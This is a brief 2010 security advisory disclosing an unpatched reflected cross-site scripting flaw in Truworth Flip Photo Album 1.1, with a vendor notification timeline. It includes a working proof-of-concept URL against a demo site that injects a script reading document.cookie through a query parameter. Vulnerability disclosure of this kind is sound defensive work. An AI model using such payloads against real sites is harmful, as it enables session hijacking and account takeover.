Truworth Flip Photo Album 1.1 Cross-Site Scripting vulnerability

Summary

There is a Cross-Site Scripting vulnerability in Truworth Flip Photo Album 1.1 which may allow an attacker to take control of the software if an authorized user browses a malicious page while logged in.

Software

Software Link: Truworth Flip Photo Album 1.1

Vulnerable Version: <= 1.1

Vendor Notification: rm@truworth.com at 2010-11-06 4:10AM

# No reply from vendor by 2010-11-13 # Advisory released.

Vulnerabilities

# Reflected Cross-Site Scripting (XSS) # ( Does not require authorized session ) # 1.1 # Unpatched

http://demo.truworthit.com/album/index.php?msg=1&value=<script>alert(document.cookie)</script>

Reference

OWASP: Cross-Site Scripting (XSS)

Appendix

[TXT] Truworth Flip Photo Album 1.1 Cross-Site Scripting vulnerability